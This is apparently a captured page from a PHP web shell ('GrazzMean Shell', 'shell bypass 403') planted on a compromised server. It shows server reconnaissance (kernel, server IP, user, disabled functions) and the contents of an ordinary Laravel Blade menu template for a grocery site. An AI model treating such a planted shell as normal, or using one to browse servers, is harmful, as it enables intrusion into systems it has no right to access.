shell bypass 403

GrazzMean Shell

Uname: Linux peekpos.com 6.8.0-1060-aws #63~22.04.1-Ubuntu SMP Tue Jun 30 02:32:53 UTC 2026 x86_64
Software: Apache
PHP version: 8.3.25 [ PHP INFO ] PHP os: Linux
Server Ip: 47.130.192.226
Your Ip: 10.1.31.86
User: www (1001) | Group: www (1001)
Safe Mode: OFF
Disable Function:
passthru,putenv,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

name : menu.blade.php
@extends('web.layout.default')
@section('page_title')
    | {{ trans('labels.menu') }} | {{ @$categorydata->category_name }}
@endsection
@section('content')
    @if (!empty($categorydata))
        <div class="breadcrumb-sec">
            <div class="container">
                <div class="breadcrumb-sec-content">
                    <nav class="text-dark d-flex breadcrumb-divider" aria-label="breadcrumb">
                        <ol class="breadcrumb">
                            <li
                                class="breadcrumb-item {{ session()->get('direction') == '2' ? 'breadcrumb-item-rtl ps-0' : '' }}">
                                <a class="text-dark" href="{{ URL::to('/') }}">{{ trans('labels.home') }}</a>
                            </li>
                            <li class="breadcrumb-item {{ session()->get('direction') == '2' ? 'breadcrumb-item-rtl ps-0' : '' }} text-primary fw-bold active"
                                aria-current="page">{{ @$categorydata->category_name }}</li>
                        </ol>
                    </nav>
                </div>
            </div>
        </div>
        <section class="menu-section">
            <div class="container">
                <div class="row mb-5">
                    <div class="filter-sidebar mb-3">
                        <div class="sidebar-wrap" id="style-3">
                            @if (count($subcategories) > 0 || count($getitemlist) > 0)
                                <a href="{{ URL::to('/menu?category=' . $categorydata->slug) }}"
                                    class="@if (!isset($_GET['subcategory'])) active @endif">{{ trans('labels.all') }}</a>
                            @endif
                            @foreach ($subcategories as $key => $subcatdata)
                                <a href="{{ URL::to('/menu?category=' . $categorydata->slug . '&subcategory=' . $subcatdata->slug) }}"
                                    class="@if (isset($_GET['subcategory']) && $_GET['subcategory'] == $subcatdata->slug) active @endif">{{ ucfirst($subcatdata->subcategory_name) }}</a>
                            @endforeach
                        </div>
                    </div>
                    <div class="mb-3">
                        <div class="d-flex bg-secondary-rgb p-3 rounded-3 justify-content-between align-items-center">
                            <span class="fs-15 fw-600 color-changer">Showing
                                1–20
                                Of
                                50 Results
                            </span>
                            <ul class="d-flex flex-nowrap justify-content-end gap-2 nav nav-pills nav-pills-dark"
                                id="tour-pills-tab" role="tablist">
                                <!-- Tab item -->
                                <li class="nav-item">
                                    <div class="dropdown lag-btn">
                                        <a class="view-list-grid cursor-pointer rounded text-dark color-changer"
                                            href="#" role="button" data-bs-toggle="dropdown" aria-expanded="false"
                                            tooltip="Filter View">
                                            <i class="fa-solid fa-filter"></i>
                                        </a>
                                        <ul class="dropdown-menu shadow bg-body-secondary border-0 p-0 mt-2" style="">
                                            <li>
                                                <a class="dropdown-item text-dark d-flex gap-2 align-items-center p-2  "
                                                    href="http://192.168.29.166/dhruvildesai/GorceryGo_v.9.6/view-all?type=recommended&amp;filter=veg">
                                                    <img src="http://192.168.29.166/dhruvildesai/GorceryGo_v.9.6/storage/app/public/admin-assets/images/about/veg.svg"
                                                        alt="">
                                                    Veg
                                                </a>
                                            </li>
                                            <li>
                                                <a class="dropdown-item text-dark d-flex gap-2 align-items-center p-2  "
                                                    href="http://192.168.29.166/dhruvildesai/GorceryGo_v.9.6/view-all?type=recommended&amp;filter=nonveg">
                                                    <img src="http://192.168.29.166/dhruvildesai/GorceryGo_v.9.6/storage/app/public/admin-assets/images/about/nonveg.svg"
                                                        alt="">
                                                    Non-Veg
                                                </a>
                                            </li>
                                        </ul>
                                    </div>
                                </li>
                                <li class="nav-item">
                                    <a class="nav-link view-list-grid cursor-pointer text-dark color-changer service-active"
                                        id="column" tooltip="Grid view">
                                        <i class="fa-solid fa-grid-2"></i>
                                    </a>
                                </li>
                                <li class="nav-item">
                                    <a class="nav-link view-list-grid cursor-pointer text-dark color-changer" id="grid"
                                        tooltip="List view">
                                        <i class="fa-solid fa-list-ul"></i>
                                    </a>
                                </li>
                                <!-- Tab item -->
                            </ul>
                        </div>
                    </div>
                    @if (count($getitemlist) > 0)
                        <div class="menu my-0">
                            <div class="listing-view">
                                <div class="row row-cols-xl-5 row-cols-lg-4 row-cols-md-3 row-cols-2 g-sm-3 g-2">
                                    @if (helper::appdata()->product_card_view == 1)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.grid_view.product_view_1')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 2)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.grid_view.product_view_2')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 3)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.grid_view.product_view_3')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 4)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.grid_view.product_view_4')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 5)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.grid_view.product_view_5')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 6)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.grid_view.product_view_6')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 7)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.grid_view.product_view_7')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 8)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.grid_view.product_view_8')
                                        @endforeach
                                    @endif
                                </div>
                            </div>
                            <div id="column-view" class="d-none">
                                <div class="row row-cols-xl-3 row-cols-lg-2 row-cols-md-2 row-cols-1 g-sm-3 g-2">
                                    @if (helper::appdata()->product_card_view == 1)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.list_view.listview_product_1')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 2)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.list_view.listview_product_2')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 3)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.list_view.listview_product_3')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 4)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.list_view.listview_product_4')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 5)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.list_view.listview_product_5')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 6)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.list_view.listview_product_6')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 7)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.list_view.listview_product_7')
                                        @endforeach
                                    @elseif (helper::appdata()->product_card_view == 8)
                                        @foreach ($getitemlist as $itemdata)
                                            @include('web.product_card.list_view.listview_product_8')
                                        @endforeach
                                    @endif
                                </div>
                            </div>
                        </div>
                        <div class="mt-5 d-flex justify-content-center">
                            {{ $getitemlist->appends(request()->query())->links() }}
                        </div>
                    @else
                        @include('web.nodata')
                    @endif
                </div>
            </div>
        </section>
    @else
        @include('web.nodata')
    @endif

@endsection
© 2026 GrazzMean